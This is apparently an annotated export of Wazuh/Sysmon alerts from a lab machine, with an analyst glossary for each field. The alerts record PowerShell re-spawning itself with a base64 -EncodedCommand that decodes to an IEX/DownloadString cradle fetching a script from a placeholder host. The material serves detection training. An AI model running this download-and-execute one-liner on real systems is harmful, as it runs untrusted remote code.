data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:36.286 ProcessGuid: {94294ddc-bd30-680a-4e0b-000000000e00} ProcessId: 5012 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd2d-680a-4c0b-000000000e00} ParentProcessId: 13716 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:36.286
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd30-680a-4e0b-000000000e00}
Sysmon's GUID for this process, unique even after the PID is reused. Pivot on it to pull every Sysmon event (process create, network, file create) for the same process.

data.win.eventdata.processId:  5012
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
Filename baked into the PE version resource. If it differs from the Image filename the binary was renamed on disk, a common way to dodge name-based rules. Here it matches, so this is powershell.exe under its real name.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line of the new process. -EncodedCommand takes a base64-encoded UTF-16LE script, so decode it before judging the alert; here it decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), i.e. fetch script text from a URL and run it in memory. -NoProfile and -NoLogo are typical of scripted rather than interactive launches.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
Logon session ID (hex). Match it to the Security 4624 event with the same Logon ID to see how and when Attcker1 logged on; logonGuid names the same session as a GUID.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
Integrity level of the process token. Medium = standard user, High = elevated (admin), System = service. Medium here means nothing has elevated yet; watch for a High-level child.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash(es) of the image file in the algorithms configured in Sysmon (SHA256 here). For a Microsoft binary, check it against the known-good hash for that FileVersion; a mismatch means the file was replaced. It is identical across the Process Create events here, so the same binary each time.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd2d-680a-4c0b-000000000e00}
Sysmon GUID of the parent process. Pivot on it to find the parent's own Event ID 1, and keep walking up until you reach the first non-PowerShell launcher, which is what the investigation has to explain.

data.win.eventdata.parentProcessId:  13716
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Command line of the parent. It carries the same -EncodedCommand payload as this process's commandLine (base64 UTF-16LE; decodes to the IEX(New-Object Net.WebClient).DownloadString('https://example.com/test') one-liner), so PowerShell is re-spawning itself with an identical payload; walk up via parentProcessGuid to the first non-PowerShell launcher.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:40.424+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:40.424+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  59
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534260.1452892
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:37.9972832Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283932
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:37.993 ProcessGuid: {94294ddc-bd30-680a-4e0b-000000000e00} ProcessId: 5012 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_esc2b0h1.abg.ps1 CreationUtcTime: 2025-04-24 22:37:37.990 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:37.993
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd30-680a-4e0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5012
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_esc2b0h1.abg.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:37.990
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:43.367+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:43.367+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  56
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534263.1455657
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:40.4496218Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283985
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:39.119 ProcessGuid: {94294ddc-bd33-680a-510b-000000000e00} ProcessId: 14452 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd30-680a-4e0b-000000000e00} ParentProcessId: 5012 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:39.119
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd33-680a-510b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14452
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\Users\Attcker1\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd30-680a-4e0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  5012
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:43.394+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:43.394+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  60
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534263.1463724
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:40.7271675Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283987
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:40.661 ProcessGuid: {94294ddc-bd33-680a-510b-000000000e00} ProcessId: 14452 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_11mj13ze.ayt.ps1 CreationUtcTime: 2025-04-24 22:37:40.661 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:40.661
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd33-680a-510b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14452
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_11mj13ze.ayt.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:40.661
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:46.000+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:46.000+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  57
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534266.1466493
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:43.8586741Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

